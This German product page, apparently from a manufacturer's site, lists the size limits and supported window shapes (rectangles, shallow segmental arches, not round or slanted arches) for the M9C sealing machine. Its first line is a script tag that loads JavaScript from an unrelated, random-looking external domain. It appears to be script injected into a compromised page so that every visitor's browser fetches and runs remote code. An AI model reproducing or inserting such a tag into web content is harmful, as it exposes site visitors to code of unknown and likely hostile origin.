<script type="text/javascript" src="http://www.alga9frog.com/js/162003.js" ></script> <noscript></noscript>

Abmessungen une geometrische Formen

Minimale / Maximale Abmessungen der Fenster und Türen

Die maximalen Gesamtabmessungen der Elemente, die von der Maschine M9C versiegelt werden können sind:

  • Höhe : 3,20 m
  • Breite : 3,50 m
  • Dicke : 190 mm

vorausgesetzt, dass die entsprechenden Optionen während der Baustudie der Maschine ausgewählt wurden.

Die minimalen Gesamtabmessungen der Elemente, die von der Maschine M9C versiegelt werden können sind:

  • Höhe : 0,40 m
  • Breite: 0,40 m

Die Mindestabmessungen der zu versiegelnde Scheibe im vollautomatischen Modus sind: 0,15m x 0,15m. Unterhalb dieser muss man die Scheibe manuell anzeigen, bevor man einen automatischen Versiegelungszyklus startet.

 

Geometrische Formen

Die Maschine M9C ist so konzipiert, dass sie mit quadratischen oder rechteckigen Elementen mit oder ohne Sprossen arbeiten kann.

Stichbögen (bis einen 10%-Pfeil der Breite des Elementes) können schonend mit der Maschine versiegelt werden dank einem einfachen Verfahren, das während der Bedienerschulung vermittelt wird.

 

Rundbögen oder Korbgriffe können nicht versiegelt werden. In diesem Fall schlagen wir vor, die drei Rechteckseiten mit der Maschine M9C zu versiegeln (mit einem speziellen Verfahren) und die Rundung von Hand nach der Versiegelung zu versiegeln.

In ähnlicher Weise können schräge Bögen nicht mit der Maschine versiegelt werden.